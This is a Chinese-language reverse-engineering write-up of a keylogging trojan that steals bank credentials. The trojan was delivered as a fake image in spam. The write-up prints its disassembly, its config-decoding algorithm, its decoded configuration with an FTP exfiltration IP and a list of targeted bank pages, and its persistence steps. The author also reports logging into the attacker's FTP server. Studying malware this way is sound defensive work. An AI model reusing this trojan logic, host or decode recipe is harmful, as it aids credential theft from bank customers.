【文章标题】: 一个偷银行帐号木马的简单分析
【文章作者】: CCDebuger
【下载地址】: 自己搜索下载
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
--------------------------------------------------------------------------------
【详细过程】
今天看邮箱,收到一封 刘娜 <mnbppp@163.com> 来的垃圾邮件,内容如下:
您好 我在互联网上看到你们公司发的产品信息
请问向这种的什么价格 可以邮购吗 谢谢回复
里面有个附件“图片.rar”,一看就估计有问题。下载“图片.rar”解压后,里面有个“图片.exe”文件,图标伪装成资源管理器中图片文件的图标,实际是个 RAR 自解压文件,解压脚本如下:
;下面的注释包含自解压脚本命令
Path=%systemroot%\temp
SavePath
Setup=book.exe
Presetup=1.jpg
Silent=1
Overwrite=2
直接用 WinRAR 解压,看里面的 book.exe。这个程序不知道加了什么壳,脱的时候看了一下,有好几层壳,不过都是压缩壳,直接 ESP 定律脱之。脱完是个 Delphi 编的程序,看了一下资源,里面的 RCDATA 中有个 INFO 的资源,应该就是加密后的配置文件了。先 IDA 分析一下,这个程序倒是比较直接:先解码配置文件,然后复制自身到系统目录运行,再设一些注册表项目,再来监视键盘:
CODE:00433FC0 public start
CODE:00433FC0 start:
CODE:00433FC0
push ebp
CODE:00433FC1
mov ebp,
esp
CODE:00433FC3
mov ecx, 6
CODE:00433FC3
CODE:00433FC8
CODE:00433FC8 loc_433FC8:
; CODE XREF: CODE:00433FCDj
CODE:00433FC8
push 0
CODE:00433FCA
push 0
CODE:00433FCC
dec ecx
CODE:00433FCD
jnz short loc_433FC8
CODE:00433FCD
CODE:00433FCF
push ecx
CODE:00433FD0
push ebx
CODE:00433FD1
push esi
CODE:00433FD2
mov eax,
offset dword_433EF0
CODE:00433FD7
call Sysinit::__linkproc__ InitExe(void *)
CODE:00433FD7
CODE:00433FDC
mov esi,
offset unk_437A4C
CODE:00433FE1
xor eax,
eax
CODE:00433FE3
push ebp
CODE:00433FE4
push offset loc_4341B0
CODE:00433FE9
push dword ptr fs:[
eax]
CODE:00433FEC
mov fs:[
eax],
esp
CODE:00433FEF
lea edx, [
ebp-14h]
CODE:00433FF2
mov eax, 1
CODE:00433FF7
call System::ParamStr(
int)
CODE:00433FF7
CODE:00433FFC
mov eax, [
ebp-14h]
CODE:00433FFF
mov edx,
offset s->Lanzateactivex
; "/lanzateActiveX"
CODE:00434004
call System::__linkproc__
LStrCmp(void)
CODE:00434004
CODE:00434009
jnz short loc_43403C
CODE:00434009
CODE:0043400B
push 0
CODE:0043400D
push offset dword_4341D8
CODE:00434012
push offset s->Reactivateactivex_0
; "/reactivateActiveX"
CODE:00434017
lea edx, [
ebp-18h]
CODE:0043401A
xor eax,
eax
CODE:0043401C
call System::ParamStr(
int)
CODE:0043401C
CODE:00434021
mov eax, [
ebp-18h]
CODE:00434024
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00434024
CODE:00434029
push eax
CODE:0043402A
push 0
CODE:0043402C
mov eax,
ds:hInstance
CODE:00434031
push eax
CODE:00434032
call ShellExecuteA
CODE:00434032
CODE:00434037
call System::__linkproc__ Halt0(void)
CODE:00434037
CODE:0043403C
; ---------------------------------------------------------------------------
CODE:0043403C
CODE:0043403C loc_43403C:
; CODE XREF: CODE:00434009j
CODE:0043403C
lea edx, [
ebp-1Ch]
CODE:0043403F
mov eax, 1
CODE:00434044
call System::ParamStr(
int)
CODE:00434044
CODE:00434049
mov eax, [
ebp-1Ch]
CODE:0043404C
mov edx,
offset s->Lanzaterunonce_0
; "/lanzateRunOnce"
CODE:00434051
call System::__linkproc__
LStrCmp(void)
CODE:00434051
CODE:00434056
jnz short loc_434089
CODE:00434056
CODE:00434058
push 0
CODE:0043405A
push offset dword_4341D8
CODE:0043405F
push offset s->Reactivaterunonce_0
; "/reactivateRunOnce"
CODE:00434064
lea edx, [
ebp-20h]
CODE:00434067
xor eax,
eax
CODE:00434069
call System::ParamStr(
int)
CODE:00434069
CODE:0043406E
mov eax, [
ebp-20h]
CODE:00434071
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00434071
CODE:00434076
push eax
CODE:00434077
push 0
CODE:00434079
mov eax,
ds:hInstance
CODE:0043407E
push eax
CODE:0043407F
call ShellExecuteA
CODE:0043407F
CODE:00434084
call System::__linkproc__ Halt0(void)
CODE:00434084
CODE:00434089
; ---------------------------------------------------------------------------
CODE:00434089
CODE:00434089 loc_434089:
; CODE XREF: CODE:00434056j
CODE:00434089
lea edx, [
ebp-24h]
CODE:0043408C
mov eax, 1
CODE:00434091
call System::ParamStr(
int)
CODE:00434091
CODE:00434096
mov eax, [
ebp-24h]
CODE:00434099
mov edx,
offset s->Instalando
; "/instalando"
CODE:0043409E
call System::__linkproc__
LStrCmp(void)
CODE:0043409E
CODE:004340A3
jz short loc_4340DD
CODE:004340A3
CODE:004340A5
lea edx, [
ebp-28h]
CODE:004340A8
mov eax, 1
CODE:004340AD
call System::ParamStr(
int)
CODE:004340AD
CODE:004340B2
mov eax, [
ebp-28h]
CODE:004340B5
mov edx,
offset s->Reactivateactivex_1
; "/reactivateActiveX"
CODE:004340BA
call System::__linkproc__
LStrCmp(void)
CODE:004340BA
CODE:004340BF
jz short loc_4340DD
CODE:004340BF
CODE:004340C1
lea edx, [
ebp-2Ch]
CODE:004340C4
mov eax, 1
CODE:004340C9
call System::ParamStr(
int)
CODE:004340C9
CODE:004340CE
mov eax, [
ebp-2Ch]
CODE:004340D1
mov edx,
offset s->Reactivaterunonce_1
; "/reactivateRunOnce"
CODE:004340D6
call System::__linkproc__
LStrCmp(void)
CODE:004340D6
CODE:004340DB
jnz short loc_43411B
CODE:004340DB
CODE:004340DD
CODE:004340DD loc_4340DD:
; CODE XREF: CODE:004340A3j
CODE:004340DD
; CODE:004340BFj
CODE:004340DD
lea edx, [
ebp-30h]
CODE:004340E0
mov eax, 2
CODE:004340E5
call System::ParamStr(
int)
CODE:004340E5
CODE:004340EA
mov eax, [
ebp-30h]
CODE:004340ED
mov edx,
offset s->Melt
; "/melt"
CODE:004340F2
call System::__linkproc__
LStrCmp(void)
CODE:004340F2
CODE:004340F7
jnz short loc_43411B
CODE:004340F7
CODE:004340F9
jmp short loc_434102
CODE:004340F9
CODE:004340FB
; ---------------------------------------------------------------------------
CODE:004340FB
CODE:004340FB loc_4340FB:
; CODE XREF: CODE:00434119j
CODE:004340FB
push 64h
CODE:004340FD
call Sleep
CODE:004340FD
CODE:00434102
CODE:00434102 loc_434102:
; CODE XREF: CODE:004340F9j
CODE:00434102
lea edx, [
ebp-34h]
CODE:00434105
mov eax, 3
CODE:0043410A
call System::ParamStr(
int)
CODE:0043410A
CODE:0043410F
mov eax, [
ebp-34h]
CODE:00434112
call Sysutils::
DeleteFile(System::AnsiString)
CODE:00434112
CODE:00434117
test al,
al
CODE:00434119
jz short loc_4340FB
CODE:00434119
CODE:0043411B
CODE:0043411B loc_43411B:
; CODE XREF: CODE:004340DBj
CODE:0043411B
; CODE:004340F7j
CODE:0043411B
push offset s->Ik0_1Abcd
; "IK 0.1 abcd"
CODE:00434120
push 0FFFFFFFFh
CODE:00434122
push 0
CODE:00434124
call _Create_Mutex
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00434124
CODE:00434129
mov ebx,
eax
CODE:0043412B
call GetLastError
CODE:0043412B
CODE:00434130
cmp eax, ERROR_ALREADY_EXISTS
CODE:00434135
jnz short loc_43413C
CODE:00434135
CODE:00434137
call System::__linkproc__ Halt0(void)
CODE:00434137
CODE:0043413C
; ---------------------------------------------------------------------------
CODE:0043413C
CODE:0043413C loc_43413C:
; CODE XREF: CODE:00434135j
CODE:0043413C
call _Read_INFO
; 读取 RCDATA 中 INFO 的内容并解码
CODE:0043413C
CODE:00434141
call _Copy_and_Run
; 复制自身到系统目录并运行
CODE:00434141
CODE:00434146
call _Set_Reg_Info
; 在注册表中设置内容并视情况在系统目录中创建 pschost 目录,
CODE:00434146
; 复制木马到此目录,并设置注册表项。
CODE:00434146
CODE:0043414B
call _Get_KeyBoard
; 监视键盘输入
----------------------------------------------------------------------------------------------------------
一、配置文件的解码
这个木马我最感兴趣的就是看看它的配置如何,来看看解码配置这一段。先看看程序中 INFO 资源原来的数据:
0000h: 35 36 32 38 40 40 40 24 30 79 B9 45 04 BE C4 59 5628@@@$0y笶.灸Y
0010h: 65 36 E1 2B DC 34 46 CF CB 28 DB EA 80 D9 93 38 e6??F纤(坳€贀8
0020h: 55 49 B6 97 F8 19 B8 0A 02 2F 39 CE 2B AB C7 3C UI稐??./9?<
0030h: 61 39 84 8F 35 1C 7E F5 57 60 A4 B4 C2 0C 75 92 a9剰5.~鮓`ご?u?
0040h: 71 6A 9F 54 1E 76 21 A0 7F 43 FC A0 B6 07 B6 DD qj烼.v!?C鼱?遁
0050h: D7 F9 A5 1D 4D 19 25 61 49 C6 14 02 52 FD 60 A3 座?M.%aI?.R齚?
0060h: 8A 3C ED 90 FF 0F 0D D7 03 EB E7 98 48 16 1A B6 ?韾..?腌楬..?
0070h: 28 12 7C BB 9B AB 70 87 28 73 B5 3B 92 81 BE 7D (.|粵玴?s?拋緘
0080h: DF 86 BA 7F F8 40 9F FA 9D BB 17 87 98 E6 2C D5 邌?鳣燏澔.嚇??
0090h: 28 94 F1 4B 21 39 72 BC E9 99 F6 AE ED 4F C5 DB (旕K!9r奸欥O袍
00A0h: 41 C8 A0 55 2A D9 BD 0D 16 04 0A 13 8F 0F 36 AC A葼U*俳.....?6?
00B0h: F8 99 E4 FD F7 62 5D 21 4E CF B1 B3 4E D9 0F 7E 鴻潺鱞]!N媳砃?~
00C0h: 69 D6 D5 82 42 ED C6 A7 A5 FF 23 CD 49 5E ED 42 i终侭砥Д#虸^鞡
00D0h: 29 98 DE B6 F4 E6 D8 36 9B 22 A5 5B 63 81 50 9C )樲遏尕6?c丳?
00E0h: 5E 7C 2D 15 49 0A 17 3B 4C C4 F1 BB DA 78 61 4B ^|-.I..;L鸟悔xaK
00F0h: 57 20 50 95 4C 06 8C 0F EC ED 50 FA F0 61 9C 88 W P昄.?祉Pa湀
0100h: 24 73 05 15 CE 26 DA E6 AD BF A4 94 6F 8E 95 29 $s..?阪o帟)
0110h: 2C 1A A1 01 DD 8C F5 C7 4D 21 16 C7 EC 8C C7 56 ,.?輰跚M!.庆屒V
0120h: 83 58 92 42 D7 10 30 8C FA F5 60 06 41 50 3D 4C 僗払?0岤鮜.AP=L
0130h: A2 4B FF 15 C4 11 DA E5 0E EC 4C 6E 6D B6 F7 B2 .?阱.霯nm恩?
0140h: EE D5 DB 46 26 F7 52 DC 31 ED 64 61 B2 AF B3 80 钫跢&鱎?韉a帛硛
0150h: CA 81 EB 95 D0 2E 34 ED AF F1 94 DC E4 06 31 82 蕘霑?4懑駭茕.1?
0160h: 6F 47 55 78 30 7D 50 6E FA 4B 8B 99 39 75 9B 76 oGUx0}Pn鶮嫏9u泇
0170h: AA 7A B0 58 8A 45 E3 01 B3 06 B7 20 30 28 87 CE 獄癤奅???0(囄
0180h: 28 33 5E 20 1C 9A 15 FB B8 B1 A1 38 5E 18 0D C7 (3^ .?薄8^..?
0190h: 66 B2 3D 57 CE D3 3D 3C 68 B7 99 5D F3 8D F8 2F f?W斡=<h窓]髰?
01A0h: D2 41 AC 71 FD 1B 88 3B 9E 6F D4 E7 C2 E6 13 7A 褹琿??瀘早骆.z
01B0h: 75 41 03 F2 7F 69 76 89 60 D8 B5 BD EC EF BA 07 uA.?iv塦氐届锖.
01C0h: BE 42 77 B2 95 EB 74 8C BC A6 3B 40 18 29 4E 4D 綛w矔雝尲?@.)NM
01D0h: D1 C2 2E EE D9 92 09 69 2C C4 CE FE 3F 29 FB 38 崖.钯?i,奈?)?
01E0h: 04 6C 75 6E 4D 8C D3 7C E7 95 17 1D 93 21 2B 7B .lunM層|鐣..?+{
01F0h: C5 62 00 舃.
现在看看解码配置的代码:
CODE:00433990 _Read_INFO
proc near
; CODE XREF: CODE:loc_43413Cp
CODE:00433990
CODE:00433990 var_18 =
dword ptr -18h
CODE:00433990 var_14 =
dword ptr -14h
CODE:00433990 var_10 =
dword ptr -10h
CODE:00433990 var_C =
dword ptr -0Ch
CODE:00433990 var_8 =
dword ptr -8
CODE:00433990 var_4 =
dword ptr -4
CODE:00433990
CODE:00433990
push ebp
CODE:00433991
mov ebp,
esp
CODE:00433993
xor ecx,
ecx
CODE:00433995
push ecx
CODE:00433996
push ecx
CODE:00433997
push ecx
CODE:00433998
push ecx
CODE:00433999
push ecx
CODE:0043399A
push ecx
CODE:0043399B
push ebx
CODE:0043399C
push esi
CODE:0043399D
push edi
CODE:0043399E
xor eax,
eax
CODE:004339A0
push ebp
CODE:004339A1
push offset loc_433E8E
CODE:004339A6
push dword ptr fs:[
eax]
CODE:004339A9
mov fs:[
eax],
esp
CODE:004339AC
push 0Ah
; lpType
CODE:004339AE
push offset s->Info
; "INFO"
CODE:004339B3
mov eax,
ds:hInstance
CODE:004339B8
push eax ; hModule
CODE:004339B9
call FindResourceA
CODE:004339B9
CODE:004339BE
mov ebx,
eax
CODE:004339C0
push ebx ; hResInfo
CODE:004339C1
mov eax,
ds:hInstance
CODE:004339C6
push eax ; hModule
CODE:004339C7
call SizeofResource
CODE:004339C7
CODE:004339CC
mov esi,
eax
CODE:004339CE
push ebx ; hResInfo
CODE:004339CF
mov eax,
ds:hInstance
CODE:004339D4
push eax ; hModule
CODE:004339D5
call LoadResource
CODE:004339D5
CODE:004339DA
mov ebx,
eax
CODE:004339DC
push ebx ; hResData
CODE:004339DD
call LockResource
CODE:004339DD
CODE:004339E2
mov edi,
eax
CODE:004339E4
test edi,
edi
CODE:004339E6
jnz short loc_4339ED
CODE:004339E6
CODE:004339E8
call System::__linkproc__ Halt0(void)
CODE:004339E8
CODE:004339ED
; ---------------------------------------------------------------------------
CODE:004339ED
CODE:004339ED loc_4339ED:
; CODE XREF: _Read_INFO+56j
CODE:004339ED
mov edx,
esi
CODE:004339EF
dec edx
CODE:004339F0
lea eax, [
ebp+var_4]
CODE:004339F3
call System::__linkproc__ LStrSetLength(void)
CODE:004339F3
CODE:004339F8
lea eax, [
ebp+var_4]
CODE:004339FB
call j_unknown_libname_64
CODE:004339FB
CODE:00433A00
mov ecx,
esi
CODE:00433A02
mov edx,
edi
CODE:00433A04
call _Move_Data
CODE:00433A04
CODE:00433A09
push ebx ; hResData
CODE:00433A0A
call FreeResource
CODE:00433A0A
CODE:00433A0F
lea eax, [
ebp+var_C]
CODE:00433A12
push eax
CODE:00433A13
mov edx, [
ebp+var_4]
CODE:00433A16
mov eax,
offset off_433EAC
CODE:00433A1B
call _Cmp_Str_by_Len
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00433A1B
CODE:00433A20
mov ecx,
eax
CODE:00433A22
dec ecx
CODE:00433A23
mov edx, 1
CODE:00433A28
mov eax, [
ebp+var_4]
CODE:00433A2B
call System::__linkproc__ LStrCopy(void)
CODE:00433A2B
CODE:00433A30
mov eax, [
ebp+var_C]
CODE:00433A33
call Sysutils::
StrToInt(System::AnsiString)
CODE:00433A33
CODE:00433A38
mov ebx,
eax
CODE:00433A3A
lea eax, [
ebp+var_4]
CODE:00433A3D
push eax
CODE:00433A3E
mov edx, [
ebp+var_4]
CODE:00433A41
mov eax,
offset off_433EAC
CODE:00433A46
call _Cmp_Str_by_Len
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00433A46
CODE:00433A4B
push eax
CODE:00433A4C
mov eax, [
ebp+var_4]
CODE:00433A4F
call _Get_StrLen
CODE:00433A4F
CODE:00433A54
pop edx
CODE:00433A55
sub eax,
edx
CODE:00433A57
add eax, 3
CODE:00433A5A
push eax
CODE:00433A5B
mov edx, [
ebp+var_4]
CODE:00433A5E
mov eax,
offset off_433EAC
CODE:00433A63
call _Cmp_Str_by_Len
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:00433A63
CODE:00433A68
mov edx,
eax
CODE:00433A6A
add edx, 3
CODE:00433A6D
mov eax, [
ebp+var_4]
CODE:00433A70
pop ecx
CODE:00433A71
call System::__linkproc__ LStrCopy(void)
CODE:00433A71
CODE:00433A76
lea ecx, [
ebp+var_10]
CODE:00433A79
mov edx,
ebx
CODE:00433A7B
mov eax, [
ebp+var_4]
CODE:00433A7E
call _Decrypt_INFO
; 这里面对 INFO 中的数据进行解码
CODE:00433A7E
CODE:00433A83
mov edx, [
ebp+var_10]
; 程序中的INFO资源解码后的结果地址送EDX
CODE:00433A86
lea eax, [
ebp+var_4]
CODE:00433A89
call System::__linkproc__ LStrLAsg(void *,void *)
CODE:00433A89
CODE:00433A8E
mov ebx, 1
CODE:00433A8E
CODE:00433A93
CODE:00433A93 loc_433A93:
; CODE XREF: _Read_INFO+4DDj
----------------------------------------------------------------------------------------------------------
解码算法:
CODE:00414834 loc_414834:
; CODE XREF: _Decrypt_INFO+69j
; Per-byte decode loop of _Decrypt_INFO; the function's entry and exit are
; not part of this excerpt. Register roles as read from the instructions
; below: ebx = 1-based byte index, ebp = base of the input (ciphertext)
; bytes (used as a plain pointer here, not as a frame pointer), eax = the
; output string (reloaded every iteration because it is clobbered below),
; si = 16-bit keystream state, [esp+18h+var_14] = remaining byte count.
; Each iteration does, in pseudo-C:
;   out[i-1] = in[i-1] ^ (si >> 8);  si += in[i-1];  si = si*0BC17h + 0F386h;
; (all of it in 16-bit arithmetic, so si wraps). The initial value of si is
; not visible in this excerpt; with it and these two constants the INFO
; resource of this family can be decoded offline without running the sample.
CODE:00414834
mov eax, [
esp+18h+var_18]
CODE:00414837
call _Read_Str
; helper not shown; its result in eax is used as the output buffer below,
; presumably a writable pointer to the result string
CODE:00414837
CODE:0041483C
movzx edi,
bx ; the section below is the decoding algorithm
CODE:0041483F
mov dl, [
ebp+
edi-1]
; dl = in[i-1]
CODE:00414843
movzx ecx,
si
CODE:00414846
shr ecx, 8
; cl = high byte of the keystream state
CODE:00414849
xor dl,
cl
CODE:0041484B
mov [
eax+
edi-1],
dl
; out[i-1] = in[i-1] ^ (si >> 8)
CODE:0041484F
xor eax,
eax
; eax (the output pointer) is discarded here, hence the reload at the loop top
CODE:00414851
mov al, [
ebp+
edi-1]
; the ciphertext byte, not the plaintext, is fed back into the state
CODE:00414855
add si,
ax
CODE:00414858
imul ax,
si, 0BC17h
CODE:0041485D
add ax, 0F386h
; 16-bit affine step; the upper bits of eax are still zero from the xor above
CODE:00414861
mov esi,
eax
CODE:00414863
inc ebx
CODE:00414864
dec [
esp+18h+var_14]
CODE:00414869
jnz short loc_414834
让加密的配置文件在 OD 中动态跑一下,利用程序自身来解出配置文件。加密数据中开始的那个“5628”是不参加解码的(从上面 _Read_INFO 的代码看,它被 StrToInt 转换后作为参数传给了 _Decrypt_INFO,应该是解码用的初始值)。整理后如下(为安全计,隐去 FTP 用户名和密码。//后面是我加的注释):
1
125.64.24.60 //FTP 的 IP 地址
2** //FTP 用户名?
1** //FTP 密码?
21 //FTP 端口
/IKLogs/%UserName%/
0
0
0
1
%Windir%\RSTray.exe //系统的 Windows 目录下创建木马文件
1
010000
svchost //设置注册表中的自动运行项
SCISound
{4fz8rk-15aq-16nc-23or4-2ke0fa051515}
pschost
1
中国建设银行|||广东发展银行|||中国民生银行|||中国邮政支付网关|||网付通支付网关|||广州市商业银行|||顺德信用社|||信社e-bank|||兴业银行|||深圳平安银行|||在线兴业|||平安个人网上银行|||宁波银行|||信用合作联社|||支付页面|||客户交易结果信息显示|||
1000
800
50
1
SOFTWARE\Microsoft\Cryptography\RNG\
1
根据上面弄出来的东西,应该是个偷银行帐号的马,估计和 IKlogger 这个软件有关。用得出来的 FTP 地址和用户名、密码,连了一下,里面有个 iklogs 目录,再按监测到各个电脑的用户名分类建立目录,各用户名目录下分别生成 clickshots 和 logs 目录,这个 logs 目录下面按时间生成的文本文件就是键盘记录了。
----------------------------------------------------------------------------------------------------------
二、复制自身并运行
CODE:004332C4 _Copy_and_Run
proc near
; CODE XREF: CODE:00434141p
; Installs a copy of the running executable and re-launches it.
; Observed behaviour (see the calls below): the two configured path strings
; at off_4361BC and off_4360FC are expanded through
; _Envionment_Var_To_Real_Value and stored back; ParamStr(0) (own path) is
; compared with [off_4361BC]. If they already match the function just
; returns. Otherwise CopyFileA copies the running file to the configured
; path (per the decoded config: %Windir%\RSTray.exe), ShellExecuteA starts
; the copy with "/instalando /melt \"<own path>\"" when the config byte at
; off_436188 is 1, else with "/instalando", and Halt0 ends this instance.
; No registers are documented as inputs; all state comes from the globals
; named above. For detection purposes the observable sequence is: file
; write into the Windows directory immediately followed by a new process
; of that file with an /instalando argument.
CODE:004332C4
CODE:004332C4 var_1C =
dword ptr -1Ch
CODE:004332C4 var_18 =
dword ptr -18h
CODE:004332C4 var_14 =
dword ptr -14h
CODE:004332C4 var_10 =
dword ptr -10h
CODE:004332C4 var_C =
dword ptr -0Ch
CODE:004332C4 var_8 =
dword ptr -8
CODE:004332C4 var_4 =
dword ptr -4
CODE:004332C4
CODE:004332C4
push ebp
CODE:004332C5
mov ebp,
esp
CODE:004332C7
xor ecx,
ecx
CODE:004332C9
push ecx
CODE:004332CA
push ecx
CODE:004332CB
push ecx
CODE:004332CC
push ecx
CODE:004332CD
push ecx
CODE:004332CE
push ecx
CODE:004332CF
push ecx
; seven zeroed AnsiString locals (var_4 .. var_1C), cleared again at loc_433401
CODE:004332D0
xor eax,
eax
CODE:004332D2
push ebp
CODE:004332D3
push offset loc_43340F
CODE:004332D8
push dword ptr fs:[
eax]
CODE:004332DB
mov fs:[
eax],
esp
; installs an exception frame at fs:[0] with handler loc_43340F;
; torn down again at loc_4333F4
CODE:004332DE
lea edx, [
ebp+var_4]
CODE:004332E1
mov eax,
ds:off_4361BC
CODE:004332E6
mov eax, [
eax]
CODE:004332E8
call _Envionment_Var_To_Real_Value
; expand environment variables into the real system path
CODE:004332E8
CODE:004332ED
mov edx, [
ebp+var_4]
CODE:004332F0
mov eax,
ds:off_4361BC
CODE:004332F5
call System::__linkproc__ LStrAsg(void *,void *)
; [off_4361BC] now holds the expanded install path
CODE:004332F5
CODE:004332FA
lea edx, [
ebp+var_8]
CODE:004332FD
mov eax,
ds:off_4360FC
CODE:00433302
mov eax, [
eax]
CODE:00433304
call _Envionment_Var_To_Real_Value
CODE:00433304
CODE:00433309
mov edx, [
ebp+var_8]
CODE:0043330C
mov eax,
ds:off_4360FC
CODE:00433311
call System::__linkproc__ LStrAsg(void *,void *)
CODE:00433311
CODE:00433316
lea edx, [
ebp+var_C]
CODE:00433319
xor eax,
eax
CODE:0043331B
call System::ParamStr(
int)
; var_C = ParamStr(0), the path of the running executable
CODE:0043331B
CODE:00433320
mov eax, [
ebp+var_C]
CODE:00433323
mov edx,
ds:off_4361BC
CODE:00433329
mov edx, [
edx]
CODE:0043332B
call System::__linkproc__
LStrCmp(void)
CODE:0043332B
CODE:00433330
jz loc_4333F4
; already running from the configured path: nothing to install
CODE:00433330
CODE:00433336
push 0
; bFailIfExists
CODE:00433338
mov eax,
ds:off_4361BC
CODE:0043333D
mov eax, [
eax]
CODE:0043333F
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:0043333F
CODE:00433344
push eax ; lpNewFileName
CODE:00433345
lea edx, [
ebp+var_10]
CODE:00433348
xor eax,
eax
CODE:0043334A
call System::ParamStr(
int)
CODE:0043334A
CODE:0043334F
mov eax, [
ebp+var_10]
CODE:00433352
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00433352
CODE:00433357
push eax ; lpExistingFileName
CODE:00433358
call CopyFileA
; copy the trojan to the Windows directory; per the decoded config it is renamed RSTray.exe
; (the return value is not checked: a failed copy still leads to ShellExecuteA below)
CODE:00433358
CODE:0043335D
mov eax,
ds:off_436188
CODE:00433362
cmp byte ptr [
eax], 1
; config flag: 1 selects the "/instalando /melt" launch variant
CODE:00433365
jnz short loc_4333C9
CODE:00433365
CODE:00433367
push 0
; nShowCmd
CODE:00433369
push offset Directory
; lpDirectory
CODE:0043336E
push offset s->InstalandoMelt
; "/instalando /melt \""
CODE:00433373
lea edx, [
ebp+var_1C]
CODE:00433376
xor eax,
eax
CODE:00433378
call System::ParamStr(
int)
CODE:00433378
CODE:0043337D
mov eax, [
ebp+var_1C]
CODE:00433380
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:00433380
CODE:00433385
mov edx,
eax
CODE:00433387
lea eax, [
ebp+var_18]
CODE:0043338A
call _Get_String_Len
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:0043338A
CODE:0043338F
push [
ebp+var_18]
CODE:00433392
push offset dword_433444
; third piece of the argument string; presumably the closing quote
CODE:00433397
lea eax, [
ebp+var_14]
CODE:0043339A
mov edx, 3
CODE:0043339F
call System::__linkproc__ LStrCatN(void)
; var_14 = "/instalando /melt \"" + <own path> + dword_433444
CODE:0043339F
CODE:004333A4
mov eax, [
ebp+var_14]
CODE:004333A7
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004333A7
CODE:004333AC
push eax ; lpParameters
CODE:004333AD
mov eax,
ds:off_4361BC
CODE:004333B2
mov eax, [
eax]
CODE:004333B4
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004333B4
CODE:004333B9
push eax ; lpFile
CODE:004333BA
push 0
; lpOperation
CODE:004333BC
mov eax,
ds:hInstance
CODE:004333C1
push eax ; hwnd
CODE:004333C2
call ShellExecuteA
; run the trojan with the /instalando /melt arguments built above
CODE:004333C2
CODE:004333C7
jmp short loc_4333EF
CODE:004333C7
CODE:004333C9
; ---------------------------------------------------------------------------
CODE:004333C9
CODE:004333C9 loc_4333C9:
; CODE XREF: _Copy_and_Run+A1j
; flag was not 1: launch the copy with the plain "/instalando" argument
CODE:004333C9
push 0
; nShowCmd
CODE:004333CB
push offset Directory
; lpDirectory
CODE:004333D0
push offset Parameters
; "/instalando"
CODE:004333D5
mov eax,
ds:off_4361BC
CODE:004333DA
mov eax, [
eax]
CODE:004333DC
call System::__linkproc__ LStrToPChar(System::AnsiString)
CODE:004333DC
CODE:004333E1
push eax ; lpFile
CODE:004333E2
push 0
; lpOperation
CODE:004333E4
mov eax,
ds:hInstance
CODE:004333E9
push eax ; hwnd
CODE:004333EA
call ShellExecuteA
CODE:004333EA
CODE:004333EF
CODE:004333EF loc_4333EF:
; CODE XREF: _Copy_and_Run+103j
CODE:004333EF
call System::__linkproc__ Halt0(void)
; this instance exits after spawning the installed copy; never returns
CODE:004333EF
CODE:004333F4
; ---------------------------------------------------------------------------
CODE:004333F4
CODE:004333F4 loc_4333F4:
; CODE XREF: _Copy_and_Run+6Cj
; normal exit: unhook the exception frame, then release the string locals
CODE:004333F4
xor eax,
eax
CODE:004333F6
pop edx
CODE:004333F7
pop ecx
CODE:004333F8
pop ecx
CODE:004333F9
mov fs:[
eax],
edx
CODE:004333FC
push offset loc_433416
CODE:004333FC
CODE:00433401
CODE:00433401 loc_433401:
; CODE XREF: _Copy_and_Run+150j
CODE:00433401
lea eax, [
ebp+var_1C]
CODE:00433404
mov edx, 7
CODE:00433409
call System::__linkproc__ LStrArrayClr(void *,
int)
; frees the 7 string locals var_1C..var_4
CODE:00433409
CODE:0043340E
retn
; returns to loc_433416 (pushed above) on the normal path
CODE:0043340E
CODE:0043340F
; ---------------------------------------------------------------------------
CODE:0043340F
CODE:0043340F loc_43340F:
; DATA XREF: _Copy_and_Run+Fo
; exception handler registered at function entry
CODE:0043340F
jmp unknown_libname_48
; BDS 2005-2006 and Delphi6-7 Visual Component Library
CODE:0043340F
CODE:00433414
; ---------------------------------------------------------------------------
CODE:00433414
jmp short loc_433401
CODE:00433414
CODE:00433416
; ---------------------------------------------------------------------------
CODE:00433416
CODE:00433416 loc_433416:
; CODE XREF: _Copy_and_Run+14Aj
CODE:00433416
; DATA XREF: _Copy_and_Run+138o
CODE:00433416
mov esp,
ebp
CODE:00433418
pop ebp
CODE:00433419
retn
CODE:00433419
CODE:00433419 _Copy_and_Run
endp
以上为文件复制部分的代码,这里我不详细讲了,只给出结果:
木马在系统的 Windows 目录下复制自身,并命名为 RSTray.exe,带参数 /instalando /melt 运行。
----------------------------------------------------------------------------------------------------------
三、注册表的设置
CODE:0043375C _Set_Reg_Info
proc near
; CODE XREF: CODE:00434146p
; Applies the persistence settings selected by the decoded config.
; Observed behaviour: if ParamStr(1) is "/reactivateActiveX" the
; HKEY_CURRENT_USER Active Setup\Installed Components key named by the
; config string at [off_4360F0] is deleted (_Delete_RegKey); if it is
; "/reactivateRunOnce" the HKEY_LOCAL_MACHINE ...\RunOnce value named by
; [off_436270] is (re)written to dword_433918 + ParamStr(0) + dword_433918
; (_Create_RegKey; dword_433918 is presumably a quote). Then six config
; flag bytes at ebx = [off_436284], each compared with 1, gate in order:
; Run key (_Create_Run_RegKey), RunOnce (_Create_RunOnce_RegKey),
; Active Setup component (_Create_Component_RegKey), pschost directory +
; self-copy (_Create_Dir_and_CopyFile), Winlogon (_Create_Winlogon_RegKey)
; and Winlogon Shell (_Create_Winlogon_Shell_RegKey). The helper bodies
; are not shown here. For defenders these are the registry locations to
; audit when this family is suspected.
CODE:0043375C
CODE:0043375C var_14 =
dword ptr -14h
CODE:0043375C var_10 =
dword ptr -10h
CODE:0043375C var_C =
dword ptr -0Ch
CODE:0043375C var_8 =
dword ptr -8
CODE:0043375C var_4 =
dword ptr -4
CODE:0043375C
CODE:0043375C
push ebp
CODE:0043375D
mov ebp,
esp
CODE:0043375F
xor ecx,
ecx
CODE:00433761
push ecx
CODE:00433762
push ecx
CODE:00433763
push ecx
CODE:00433764
push ecx
CODE:00433765
push ecx
; five zeroed AnsiString locals (var_4 .. var_14)
CODE:00433766
push ebx
CODE:00433767
mov ebx,
ds:off_436284
